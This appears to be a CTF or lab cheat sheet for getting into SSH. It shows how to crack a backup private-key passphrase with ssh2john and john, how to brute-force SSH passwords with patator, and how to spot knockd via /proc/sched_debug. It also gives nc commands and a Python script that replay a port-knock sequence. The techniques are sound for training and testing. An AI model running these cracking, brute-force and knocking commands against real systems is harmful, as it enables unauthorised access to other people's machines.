22

Cracking SSH

Did you find a backup private key (e.g. id_rsa.bak)? If it is passphrase-protected, crack the passphrase offline:

  1. Convert the key into a john-compatible hash with ssh2john (on Kali it lives at /usr/share/john/ssh2john.py):

     ssh2john id_rsa.bak > hash

  2. Crack the hash with a wordlist:

     john --wordlist=/usr/share/wordlists/rockyou.txt hash
     john --show hash

     * Use the path where you actually keep rockyou.txt.

  3. Log in with the private key, entering the recovered passphrase when prompted. SSH refuses keys with loose permissions, so restrict them first:

     chmod 600 id_rsa.bak
     ssh -i id_rsa.bak joanna@IP

If you only have a username and no key, brute force the password with patator instead:

  patator ssh_login host=IP user=joanna password=FILE0 0=/usr/share/wordlists/rockyou.txt -x ignore:mesg='Authentication failed.'

If SSH shows as filtered, the port may be protected by port knocking. Things worth checking once you have a foothold on the box:

  • /proc/sched_debug is useful sometimes: it lists the tasks on each CPU runqueue and is world-readable on many kernels, so it can reveal a process such as knockd even when ps output is restricted.

    • If "knockd" exists, a port knocking service is running, which means some ports are only opened after the correct knock sequence.

    • Its configuration lives in /etc/knockd.conf. The "sequence" line of each section lists the ports (optionally with a protocol, e.g. 8475:udp; the default is tcp) that must be hit in order, and "seq_timeout" is the window in which the whole sequence must arrive.

A typical config section names the ports in its sequence line; in this example, to reach SSH you must knock 7569, 8475 and 9842 in that order.

  • Hit these ports, in order, with nc and then try to ssh. A bare connection attempt is enough, since knockd only needs to see the SYN (-z is zero-I/O mode, -w 1 keeps each attempt short):

    for p in 7569 8475 9842; do nc -z -w 1 IP $p; done
    ssh -i id_rsa.bak joanna@IP
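The same knock, as an added Python example (not code from the original notes or from knockd): it parses the sequence lines of a knockd.conf and replays them in order, which matters when the sequence mixes TCP and UDP knocks or must fit inside seq_timeout. The config text is constructed here in knockd's syntax using the ports above; the target host and the section names (openSSH, closeSSH) are assumptions.

```python
"""Port-knocking helper: parse a knockd.conf, then replay a knock sequence.

Added example for these notes; not taken from knockd or the original page.
"""
import re
import socket
import time

# Constructed sample in knockd.conf syntax. Ports match the notes above; the
# section names and iptables commands are assumptions for illustration.
SAMPLE_KNOCKD_CONF = """
[options]
    logfile = /var/log/knockd.log

[openSSH]
    sequence    = 7569,8475,9842
    seq_timeout = 5
    command     = /sbin/iptables -A INPUT -s %IP% -p tcp --dport 22 -j ACCEPT
    tcpflags    = syn

[closeSSH]
    sequence    = 9842:tcp,8475:udp,7569:tcp
    seq_timeout = 5
    command     = /sbin/iptables -D INPUT -s %IP% -p tcp --dport 22 -j ACCEPT
    tcpflags    = syn
"""


def parse_knockd_sequences(conf_text):
    """Return {section: [(port, proto), ...]} for every section with a sequence.

    knockd accepts 'port' or 'port:proto' entries; the default protocol is tcp.
    Sections without a sequence line (such as [options]) are skipped.
    """
    sequences = {}
    section = None
    for raw in conf_text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        header = re.match(r"^\[(.+)\]$", line)
        if header:
            section = header.group(1)
            continue
        if section is None or "=" not in line:
            continue
        key, value = (part.strip() for part in line.split("=", 1))
        if key != "sequence":
            continue
        seq = []
        for entry in value.split(","):
            port, _, proto = entry.strip().partition(":")
            seq.append((int(port), (proto or "tcp").lower()))
        sequences[section] = seq
    return sequences


def knock(host, sequence, delay=0.5, timeout=1.0, connector=None):
    """Send the knocks in order and return the list of (port, proto) sent.

    knockd sniffs packets with libpcap, so a single TCP SYN (a connect attempt
    to a closed or filtered port) is enough for a tcp knock, and a UDP knock is
    a single datagram. 'delay' spaces the knocks; keep the total under the
    config's seq_timeout. 'connector' can be injected to test the ordering
    logic without touching the network.
    """
    sent = []
    for port, proto in sequence:
        if connector is not None:
            connector(host, port, proto)
        elif proto == "udp":
            with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
                s.sendto(b"", (host, port))
        else:
            with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
                s.settimeout(timeout)
                try:
                    s.connect((host, port))
                except OSError:
                    pass  # refused/filtered is expected; the SYN already left
        sent.append((port, proto))
        time.sleep(delay)
    return sent


if __name__ == "__main__":
    import sys

    target = sys.argv[1] if len(sys.argv) > 1 else "127.0.0.1"  # assumed host
    order = parse_knockd_sequences(SAMPLE_KNOCKD_CONF)["openSSH"]
    print("knocking", target, "with", order)
    knock(target, order)
    print("now try: ssh -i id_rsa.bak joanna@" + target)
```

Run it as `python3 knock.py IP` right before the ssh attempt; if the box's config is available, paste its real sections into SAMPLE_KNOCKD_CONF (or read the file) so the protocol and order come from the target rather than from a guess.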
